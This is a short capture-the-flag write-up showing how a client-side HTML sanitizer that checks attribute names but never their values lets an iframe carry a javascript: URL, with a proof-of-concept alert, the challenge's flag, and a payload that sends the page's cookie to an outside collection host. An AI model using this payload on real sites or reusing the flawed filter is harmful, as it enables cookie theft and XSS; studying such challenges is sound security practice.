This challenge seems to be similar to web/static-pastebin, except that we can add a few HTML tags and attributes. Digging into the source code reveals this `sanitize` function, which performs client-side sanitization of the input text:

```javascript
function sanitize(element) {
    // Attributes are filtered by name only; their values are never inspected
    const attributes = element.getAttributeNames();
    for (let i = 0; i < attributes.length; i++) {
        // Let people add images and styles
        if (!['src', 'width', 'height', 'alt', 'class'].includes(attributes[i])) {
            element.removeAttribute(attributes[i]);
        }
    }

    // `children` is a live collection, hence the i-- after a removal
    const children = element.children;
    for (let i = 0; i < children.length; i++) {
        if (children[i].nodeName === 'SCRIPT') {
            element.removeChild(children[i]);
            i--;
        } else {
            sanitize(children[i]);
        }
    }
}
```
From the script, we understand that we can have any tag (except `<script>`, which gets removed) and a few attributes. Sending the same payload as before won't work because the `onerror` attribute is not allowed.

Playing around with it, I found that iframes with a `src` attribute are possible.

`<iframe src="javascript:alert(1)">`
For extracting the cookie, I wrote the following payload, which redirects the iframe to a known URL with the parent site's cookie in the query string:

`<iframe src="javascript:document.location='https://anandu.free.beeceptor.com/?c'+this.parent.document.cookie+'>'"></iframe>`
And we get the flag: `flag{wh0_n33d5_d0mpur1fy}`

Original writeup (https://anandu.net/blog/redpwnctf2020-writeup/).